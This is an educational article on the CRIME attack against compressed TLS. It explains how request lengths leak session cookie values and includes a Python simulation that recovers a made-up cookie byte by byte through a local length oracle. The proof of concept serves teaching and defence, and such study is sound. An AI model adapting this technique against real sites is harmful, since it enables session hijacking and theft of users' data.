What is the CRIME attack?
CRIME, or Compression Ratio Info-leak Made Easy, is an attack in which the attacker recovers the value of a session cookie that is sent over HTTPS, without breaking the encryption itself, and then uses that cookie to impersonate the user in a web application and steal sensitive data. The attack is possible on HTTPS connections that use the data compression feature of SSL/TLS, because the length of data that is compressed and then encrypted leaks information about its content. The attack was demonstrated in 2012 by two security researchers, Juliano Rizzo and Thai Duong. Let’s understand the CRIME attack in more detail.
How does the CRIME attack work?
HTTPS (How does HTTPS protocol work?) internally uses SSL/TLS (How does TLS protocol work?). When two hosts connect to each other using HTTPS, a TLS connection is first established, and then the data is transferred in encrypted form. So an eavesdropper who records the conversation cannot read it and cannot get sensitive information from it.
On the other hand, when a user logs in to a web application, the application stores a session cookie in the user’s browser. After that, the browser automatically attaches this cookie to every HTTPS request it makes to the web application, and the application uses it to identify the user.
If an attacker can obtain this session cookie, they can present it themselves and act in the web application as the victim. However, it is usually hard for the attacker to get hold of the cookie. In an HTTPS connection with TLS compression enabled, the whole request, including the Cookie header, is first compressed with a lossless algorithm (DEFLATE) and only then encrypted. So the attacker cannot read the value of the cookie by mere eavesdropping.
In the CRIME attack, the attacker makes the victim’s browser send many HTTPS requests to the web application, for example by injecting links or script into a plain HTTP page the victim visits. The attacker cannot read the cookie, but can choose part of each request (such as the URL path), and puts a guess at the cookie value there, next to the Cookie header the browser adds. The attacker then eavesdrops on the encrypted traffic and records the size of each request. Because the request is compressed before it is encrypted, a guess that matches the beginning of the real cookie compresses better and produces a slightly shorter ciphertext than a wrong guess. By comparing the sizes, the attacker recovers the cookie one character at a time.
To see why the length leaks, we need to know a little bit about lossless compression. The example below uses a simplified run-length notation, where a run of four B’s is written as 4B. The DEFLATE compression used by TLS instead replaces a repeated substring with a short back-reference to its earlier occurrence, but the effect on the output length is the same. Let’s suppose the value of the cookie is:
BBBBACDE
After compression, the value of the cookie would be :
4BACDE
At this point, if we prepend the data with an A, the cookie and its compressed value would be :
ABBBBACDE
A4BACDE
But, if we prepend the value with a B, the cookie and its compressed value would be :
BBBBBACDE
5BACDE
So, if we prepend the data with a B, the compressed value will be less than the compressed value of …
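The same effect with the real DEFLATE algorithm, as an added simulation that is not part of the original article and not Rizzo and Duong’s tool: a constructed request with a made-up session cookie for a hypothetical host bank.example is compressed with zlib and then XORed with a random keystream, so the attacker’s oracle sees nothing but ciphertext lengths. The attacker controls only the URL path, guesses the cookie one hex character at a time, and watches which guess makes the request shorter. Two simplifications are labelled in the code: zlib is pinned to DEFLATE’s fixed Huffman table (strategy Z_FIXED) so the bit costs are predictable, and a few raw bytes are appended to the path to shift the bit alignment when a saving is hidden by rounding to whole bytes (a real attack would have to smuggle such padding into a URL).

```python
"""Simulation of the CRIME length oracle: compress-then-encrypt leaks the cookie."""
import os
import zlib
from typing import Optional

# Constructed example: the session cookie the victim's browser attaches to every
# request. The attacker never reads this directly, only ciphertext lengths.
SECRET_COOKIE = "sessionid=7f3a9c2e1b"
KNOWN_PREFIX = "sessionid="      # cookie names are public; the value is not
ALPHABET = "0123456789abcdef"    # assumption: the session id is lowercase hex

# Distinct bytes >= 0x90 each cost 9 bits under DEFLATE's fixed Huffman table,
# so appending k of them shifts the bit alignment of the output by k bits.
# (Simplification: a real attack would have to percent-encode or otherwise
# smuggle such padding into the URL.)
ALIGN_PAD = bytes(range(0x90, 0x98))


def build_request(path: bytes, cookie: str) -> bytes:
    """Plaintext of one request. The attacker controls only `path` (e.g. via a
    link or script injected into a plain-HTTP page); the browser adds the cookie."""
    return (b"GET /" + path + b" HTTP/1.1\r\n"
            b"Host: bank.example\r\n"           # hypothetical target host
            b"Cookie: " + cookie.encode() + b"\r\n\r\n")


def compress_then_encrypt(plaintext: bytes) -> bytes:
    """Models TLS record protection with compression enabled: DEFLATE, then a
    length-preserving stream cipher (XOR with a fresh random keystream here).
    Z_FIXED pins zlib to the fixed Huffman table so the bit costs above hold."""
    comp = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    compressed = comp.compress(plaintext) + comp.flush()
    keystream = os.urandom(len(compressed))
    return bytes(p ^ k for p, k in zip(compressed, keystream))


def victim_sends(path: bytes) -> int:
    """The oracle: the eavesdropper learns only the ciphertext length."""
    return len(compress_then_encrypt(build_request(path, SECRET_COOKIE)))


def next_byte(recovered: str, oracle=victim_sends) -> Optional[str]:
    """Try every candidate next character. The correct one extends the LZ77
    back-reference from the Cookie header to the path by one byte, so the
    request compresses shorter than with any wrong guess. A saving of 7 bits is
    sometimes hidden by rounding to whole bytes, so retry with 0..8 alignment
    bytes until exactly one candidate is the minimum. Returns None when no
    candidate stands out, which happens once the whole cookie is known."""
    for k in range(len(ALIGN_PAD) + 1):
        lengths = {c: oracle((recovered + c).encode() + ALIGN_PAD[:k])
                   for c in ALPHABET}
        best = min(lengths.values())
        winners = [c for c, n in lengths.items() if n == best]
        if len(winners) == 1:
            return winners[0]
    return None


def recover_cookie(known_prefix: str = KNOWN_PREFIX, max_len: int = 64) -> str:
    """Byte-by-byte recovery of the cookie value, the core of the CRIME attack."""
    recovered = known_prefix
    while len(recovered) < max_len:
        c = next_byte(recovered)
        if c is None:
            break
        recovered += c
    return recovered


if __name__ == "__main__":
    print(recover_cookie())
```

Every call to `victim_sends` stands for one request the victim’s browser was tricked into making, so recovering a 10-character hex value costs on the order of a few hundred requests. The fix that browsers and servers adopted after CRIME is simply to disable TLS-level compression; the same length oracle later reappeared against HTTP-level compression of response bodies under the name BREACH.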